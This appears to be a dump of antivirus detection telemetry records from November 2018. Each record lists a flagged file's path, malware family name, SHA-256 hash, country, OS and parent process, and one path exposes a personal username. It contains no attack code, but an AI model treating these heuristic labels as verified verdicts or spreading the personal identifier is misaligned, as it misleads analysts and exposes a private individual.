  Row(detection=Row(filename='avscan-20181101-150025-913c7bbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150025-913C7BBD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f45e31401981d58f3fa66a4db19aa65266f33507d198769db079c069f89c5127', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\F45E31401981D58F3FA66A4DB19AA65266F33507D198769DB079C069F89C5127', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f45e31401981d58f3fa66a4db19aa65266f33507d198769db079c069f89c5127', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T06:01:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093440-8e381ccf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093440-8E381CCF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='meccanico auto.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\MECCANICA\\MECCANICO AUTO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210803-5a047803', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-210803-5A047803', filesize=3904000, name='TR/Dldr.Agent.qmgbi.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:08:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='addcat.exe', filepath='D:\\pc drivers\\DP_Sound_Creative_13101 pult out\\Creative\\WinAll\\CR3\\wdm\\common\\i386\\Addcat.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='91afdbda3b0f0e7c2c56e8f770641c70add3b6f39c046a774be34ed5df7adabd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:30:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lol.launcher.admin.exe', filepath='e:\\league of legends\\lol.launcher.admin.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-064017-28129c76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61278a58\\AVSCAN-20181104-063957-2551AB9C\\AVSCAN-20181104-064017-28129C76', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:40:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185816-310c4bd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4b339434\\AVSCAN-20181104-185304-15DE2B78\\AVSCAN-20181104-185816-310C4BD4', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:25:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130817-09db6332', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130817-09DB6332', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='klplhulh.exe', filepath='F:\\RECYCLER_DETEC\\S-3-8-65-8402467574-3770633725-252716346-1347\\kLPLhUlH.exe', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1552384, timestamp='2018-11-04T12:57:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ec44', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec44', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T04:00:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\cygwin64\\hive\\ewbf034b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='stnd_update_drivers.htm', filepath='D:\\Need For Speed - Underground 2\\Support\\EA Help\\Standard_Items\\STND_Update_Drivers.htm', filesize=144000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='3702773aa609a75bc96e6d5e3d7cf9a2b252f9778cdb264fa742de6dd4974b45', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=20992, timestamp='2018-11-04T04:32:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000096f3', filepath='C:\\Windows\\Temp\\7c21ad1e-80c3-49ed-a3c2-d1c1deb5f2cd\\tmp00000033\\tmp000096f3', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='1cd4a2cf684d9b7727d5dfbc999662fe2c3a65d63c6740f5df2c880ee3d1fefd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.0.649.11190\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-04T11:08:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131355-235b4a79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131355-235B4A79', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T18:06:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132500-559bd05c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132500-559BD05C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130949-10c406f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130949-10C406F5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:09:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fdpmkv.dll', filepath='\\\\?\\C:\\Program Files\\Wondershare\\MobileGo for Android\\MultimediaLibs\\DecPlugins\\fdpMKV.dll', filesize=556000, name='W32/Ramnit.C.#M1.#R1'), hash='66cdb332d0a97cd62226c84c0e692d9b3da1ab2299491f624559a470ac1d5852', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:57:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200214-92319f94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e4b404e\\AVSCAN-20181104-200129-890F81FE\\AVSCAN-20181104-200214-92319F94', filesize=640000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='0ba087998ad82402890b695675cac24a658ef77763b4f18b53501489cd0aae99', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023d77', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023d77', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023b0b', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023b0b', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:40:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190806-2d487648', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b437d2ac\\AVSCAN-20181104-190725-25D35E9B\\AVSCAN-20181104-190806-2D487648', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:38:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T22:42:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:37:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='microsoft.mashup.document.resources.dll', filepath='C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\quz\\Microsoft.Mashup.Document.resources.dll', filesize=840000, name='HEUR/AGEN.1019635.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\16.0.11001.20074\\OfficeClickToRun.exe', parentsize=None, timestamp='2018-11-04T22:08:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:00:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210701-a300dac2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210701-A300DAC2', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:07:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Autodesk\\3ds Max 2014\\3dsmax.exe', parentsize=11053896, timestamp='2018-11-04T18:50:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='171515729.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\171515729.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/DB', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T19:15:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0342602.exe', filepath='F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP434\\A0342602.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='72dcbd7bd6f78b03de185bb2f15b97906220b52ed8e7c1ebc87a1fe08da0b0b9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T10:28:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T14:40:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='new folder.exe', filepath='F:\\digetal\\jawalari\\New folder\\New folder.exe', filesize=256000, name='W32/Drowor.#M0.#R0'), hash='b39c6fb8d2ae3356d52a251683c8efe4868bf6f882ca28d6153d60177c769842', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T08:15:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5f6f5d50-e8bc-5286-97f4-78f15e802a73.exe', filepath='F:\\{f6166e04-5b74-7686-234f-cfc6de3b0307}\\5f6f5d50-e8bc-5286-97f4-78f15e802a73.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='9d6d3b95598efbfde9027931f8c12f8aedfdf33a0e75cdca7b900b4e77dead91', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:13:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192909-2c89dc6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2baa4e4c\\AVSCAN-20181104-192753-1F30712A\\AVSCAN-20181104-192909-2C89DC6A', filesize=256000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='2e7bfe3befe455d77675e4d0f55c650f17e08d841dfadd22f065475ef40c2d5e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:29:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193829-0a99a6eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c94b811b\\AVSCAN-20181104-193736-00089EE6\\AVSCAN-20181104-193829-0A99A6EB', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:38:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='522205966738ddc518dd98c29751910064e0c415c6081c2263e4c4ddee0046a8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f87fe', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f87fe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:42:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153332-bb411c25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151404-D70ED41C\\AVSCAN-20181104-153332-BB411C25', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:33:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171434-69ad5b39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0bc51104\\AVSCAN-20181104-165011-9512470A\\AVSCAN-20181104-171434-69AD5B39', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:14:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214101-55889ae9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d26e01a\\AVSCAN-20181104-214030-51AC9EA6\\AVSCAN-20181104-214101-55889AE9', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:41:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140226-ee495988', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140226-EE495988', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:04:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='calc.exe', filepath='C:\\System32\\calc.exe', filesize=960000, name='W32/Neshta.A.#M1.#R1'), hash='28f2c9570a38409e357630a9188b2331dee3e1dfa725f6893637313aa3bda352', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T08:12:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T08:13:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xerces-c_2_6.dll', filepath='C:\\AMD\\Win7-32Bit-Radeon-Software-Adrenalin-Edition-17.12.1-Dec11\\Bin\\xerces-c_2_6.dll', filesize=2864000, name='W32/Ramnit.C.#M1.#R1'), hash='b2baa527e6eca6d855ed2201dfbf65a04a887dd3273fb945b339666e6e5cba06', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1225616, timestamp='2018-11-04T08:31:07Z'), dt=datetime.date(2018, 11, 4)),
